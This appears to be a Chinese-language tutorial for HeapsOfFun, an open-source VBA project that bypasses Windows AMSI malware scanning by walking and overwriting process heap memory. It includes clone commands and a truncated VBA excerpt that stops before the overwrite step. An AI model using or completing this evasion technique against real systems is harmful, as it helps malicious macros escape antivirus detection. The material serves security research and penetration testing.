HeapsOfFun 开源项目教程
HeapsOfFunAMSI Bypass Via the Heap项目地址:https://gitcode.com/gh_mirrors/he/HeapsOfFun
项目介绍
HeapsOfFun 是一个开源项目,旨在通过堆(Heap)绕过 AMSI(Anti-Malware Scan Interface)。该项目基于 Matt Graeber 的工作,提供了 VBA 代码来实现这一目的。项目支持 x32 和 x64 架构,主要用于安全研究和渗透测试。
项目快速启动
克隆项目
首先,克隆 HeapsOfFun 项目到本地:
git clone https://github.com/rmdavy/HeapsOfFun.git
运行示例代码
进入项目目录并查看示例代码 heapsoffun.bas
:
cd HeapsOfFun
cat heapsoffun.bas
以下是示例代码的一部分:
Sub HeapsOfFun()
Dim ProcessHeaps As Long
Dim NumberOfHeaps As Long
Dim PHE As PROCESS_HEAP_ENTRY
Dim ReadBuffer As Long
Dim WriteBuffer As Long
'The value that we're going to write on the heap
WriteBuffer = &HFFFFFFFF
NumberOfHeaps = GetProcessHeaps(1, ProcessHeaps)
'Debug Print Str(NumberOfHeaps) & " Handles to heaps that are active for the calling process"
If NumberOfHeaps > 0 Then
retval = HeapWalk(ProcessHeaps, PHE)
'retval of 0 means failure
If retval > 0 Then
Do While HeapWalk(ProcessHeaps, PHE) <> 0
'If PHE.wFlags And PROCESS_HEAP_ENTRY_BUSY) is not equal to 0 it means that we have an Allocated block
If ((PHE.wFlags And PROCESS_HEAP_ENTRY_BUSY) <> 0) Then
'Copy
编译和运行
根据你的开发环境,编译并运行 heapsoffun.bas
文件。具体步骤可能因环境而异,请参考相关文档。
应用案例和最佳实践
应用案例
HeapsOfFun 项目主要用于以下场景:
- 安全研究:研究人员可以使用该项目来测试和验证 AMSI 的绕过技术。
- 渗透测试:渗透测试人员可以利用该项目来评估系统的安全性。
最佳实践
- 代码审查:在使用该项目之前,务必进行代码审查,确保其安全性和合规性。
- 环境隔离:在隔离的环境中测试和使用该项目,避免对生产环境造成影响。
- 持续更新:关注项目的更新和安全公告,及时更新代码以应对新的安全挑战。
典型生态项目
HeapsOfFun 项目与以下生态项目相关:
- Matt Graeber 的其他项目:Matt Graeber 在安全领域有多个项目,可以相互参考和学习。
- AMSI 相关工具:其他 AMSI 绕过和分析工具,如 AMSITrigger 等。
通过结合这些生态项目,可以更全面地理解和应用 HeapsOfFun 项目。
HeapsOfFunAMSI Bypass Via the Heap项目地址:https://gitcode.com/gh_mirrors/he/HeapsOfFun